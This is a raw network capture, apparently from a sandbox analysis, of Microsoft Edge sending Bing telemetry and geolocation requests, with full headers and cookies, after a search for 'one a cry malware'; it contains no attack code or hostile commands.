cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199031.14913a95
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1729199029793%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1729199029793%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1729199029793%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2222000%22%5D%2C%22isWin11OrHigher%22%3A%22true%22%2C%22fullOsBuild%22%3A%2210.0.22000%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029812%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1729199030032%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22SuppressingFeature%22%3A%22wikiWidget%22%2C%22T%22%3A%22CI.LeftGutterUtility%22%2C%22TS%22%3A1729199030118%2C%22Name%22%3A%22LGSuppressed%22%2C%22FID%22%3A%22wikiWidget%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199030446%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1729199029793%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1729199029793%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1729199029793%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2222000%22%5D%2C%22isWin11OrHigher%22%3A%22true%22%2C%22fullOsBuild%22%3A%2210.0.22000%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029812%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1729199030032%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22SuppressingFeature%22%3A%22wikiWidget%22%2C%22T%22%3A%22CI.LeftGutterUtility%22%2C%22TS%22%3A1729199030118%2C%22Name%22%3A%22LGSuppressed%22%2C%22FID%22%3A%22wikiWidget%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199030446%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199031.14913a66
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199030447%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199030447%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault

Response

HTTP/2.0 200

cache-control: private
content-length: 25
content-type: text/html
content-encoding: gzip
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 67117bb702c84eb890dea6244d52fdf2
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-k/G0mUPQXDIBFA2p1uvNONIyZJQ0F1xH1WFyalLkApE='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 5D2B1609FA444533A608B73EAFCC759D Ref B: LON601060106054 Ref C: 2024-10-17T21:03:51Z
date: Thu, 17 Oct 2024 21:03:51 GMT
set-cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE; expires=Tue, 11-Nov-2025 21:03:51 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:51 GMT; path=/; secure; HttpOnly; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199031.14913a88
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2211%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22notebook%22%2C%22FID%22%3A%22DynScopeRank%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2211%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199030486%2C%22Name%22%3A%22notebook%22%2C%22FID%22%3A%22DynScopeRank%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199031.14913a97
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1729199030487%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1729199030487%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199031.14913ac2
GET

https://www.bing.com/geolocation/write?isBlocked=true&sid=03D76D5C9A2B6ED61E1C78479BBC6F8B&clientsid=03D76D5C9A2B6ED61E1C78479BBC6F8B

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /geolocation/write?isBlocked=true&sid=03D76D5C9A2B6ED61E1C78479BBC6F8B&clientsid=03D76D5C9A2B6ED61E1C78479BBC6F8B HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
